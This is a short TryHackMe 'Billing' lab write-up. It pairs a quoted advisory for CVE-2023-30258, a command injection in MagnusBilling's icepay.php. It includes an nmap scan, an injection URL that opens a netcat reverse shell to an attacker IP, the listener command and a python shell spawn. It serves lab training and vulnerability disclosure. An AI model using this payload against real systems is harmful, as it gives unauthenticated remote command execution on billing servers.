Try Hack Me/Billing

Write-up / THM / Billing

by:

Start the Virtual Machine

Run an nmap scan to the VM machine

From the nmap scan: nmap -sS -sC -sV IP_THM_VM_machine

Ports 22, 80, and 3306 are open

VM machine is a Debian Linux

Connect to port 80 using a web browser

nc -c sh 10.10.209.29 9001

10.10.233.21/mbilling/lib/icepay/icepay.php?democ=/dev/null; nc -c sh 10.10.209.29 9001

listen with nc

nc -lnvp 9001

python -c 'import os; os.system("/bin/sh")'

https://www.linkedin.com/pulse/linux-privesc-fail2ban-exploit-ahnaf-abrar-hasin/

https://eldstal.se/advisories/230327-magnusbilling.html

../ advisories/

Security advisory

A command injection vulnerability exists in magnusbilling versions 6 and 7. The vulnerability allows an unauthenticated user to execute arbitrary OS commands on the host, with the privileges of the web server.

Affected products

magnusbilling 7 up to and including commit 7af21ed620

magnusbilling 6 (all versions)

Steps to reproduce

The following proof of concept uses a harmless sleep 30 command as a payload.

Visit /mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%2030;ls%20a
Observe that the page takes 30 seconds to load
Visit /mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%203;ls%20a
Observe that the page takes only 3 seconds to load

Cause

A piece of demonstration code is present in lib/icepay/icepay.php, with a call to exec() at line 753. The parameter to exec() includes the GET parameter democ, which is controlled by the user.

Impact

An unauthenticated user is able to execute arbitrary OS commands. The commands run with the privileges of the web server process, typically www-data. At a minimum, this allows an attacker to compromise the billing system and its database.

Proposed Mitigation

Remove the demo code from icepay.php.

History

2023-06-26: CVE-2023-30258 assigned
2023-03-28: Initial report removed by maintainer
2023-03-27: Vulnerability fixed
2023-03-27: Vulnerability reported